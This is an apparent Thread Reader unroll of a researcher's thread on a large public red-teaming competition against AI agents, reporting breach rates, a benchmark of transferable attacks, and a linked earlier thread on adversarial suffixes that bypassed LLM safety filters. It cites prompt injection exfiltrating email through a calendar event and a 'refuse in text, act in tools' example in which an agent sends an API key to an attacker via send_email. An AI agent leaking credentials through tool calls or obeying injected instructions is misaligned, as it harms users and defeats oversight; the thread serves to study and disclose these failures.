Post

How to get URL link on X (Twitter) App

On the Twitter thread, click on or icon on the bottom
Click again on or Share Via icon
Click on Copy Link to Tweet
Paste it above and click "Unroll Thread"!
More info at Twitter Help

Andy Zou

Jul 29 • 10 tweets • 3 min read • Read on X

We deployed 44 AI agents and offered the internet $170K to attack them.

1.8M attempts, 62K breaches, including data leakage and financial loss.

🚨 Concerningly, the same exploits transfer to live production agents… (example: exfiltrating emails through calendar event) 🧵

Huge thanks to @AISecurityInst , OpenAI, Anthropic, and Google DeepMind for sponsoring, and to UK and US AISI for judging. The competition was held in the @GraySwanAI Arena.

This was the largest open red‑teaming study of AI agents to date.

Paper: arxiv.org/abs/2507.20526

We deployed agents across real tasks (shopping, travel, healthcare, coding, support) with “must‑not‑break” policies: company rules, platform terms, and industry regulations.

The most secure model still had a 1.5% attack success rate (ASR).

Implication: without additional mitigations, your AI application can be compromised on the order of minutes.

We curated the strongest, reproducible breaks into the ART benchmark - a stress test with near 100% ASR across models we tried. We’ll be open sourcing the evaluation and a subset of the attacks for research purposes, in addition to a private leaderboard.

Many breaks are universal and transferable.

Copy‑paste patterns worked across tasks, models, and guardrails. If it breaks one agent today, it likely breaks yours.

Favorite failure: “refuse in text, act in tools.” 😈

Model: “I can’t share credentials.”
Then: send_email(to=attacker, body="API_KEY=****")

The UI looks safe; the tool layer does the damage.

Can't we just patch?

History of jailbreaks says it’s whack‑a‑mole. Prompt‑only fixes don’t hold. Durable defenses require permissioned tools, policy‑aware training, and monitoring.

The upshot?

Prompt‑injection risks appear to be a primary blocker to safe autonomous deployment. Treat AI agents like untrusted code touching live systems.

Paper: arxiv.org/abs/2507.20526
Try breaking the agents yourself here: app.grayswan.ai/arena/challeng…
Blog: app.grayswan.ai/arena/blog/age…

• • •

Missing some Tweet in this thread? You can try to force a refresh

This Thread may be Removed Anytime!

Twitter may remove this content at anytime! Save it as PDF for later use!

More from @andyzou_jiaming

Andy Zou

@andyzou_jiaming

Jul 28, 2023

🚨We found adversarial suffixes that completely circumvent the alignment of open source LLMs. More concerningly, the same prompts transfer to ChatGPT, Claude, Bard, and LLaMA-2…🧵

Website:
Paper: https://t.co/1q4fzjJSyZ https://t.co/SQZxpemCDkllm-attacks.org
arxiv.org/abs/2307.15043

Claude-2 has an additional layer of safety filter. After we bypassed it with a word trick, the generation model was willing to give us the answer as well.

With only four adversarial suffixes, some of these best models followed harmful instructions over 60% of the time.

Read 12 tweets

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Share this page!

Enter URL or ID to Unroll

Andy Zou

Try unrolling a thread yourself!

More from @andyzou_jiaming

Andy Zou

Did Thread Reader help you today?

Don't want to be a Premium member but still want to support us?

Send Email!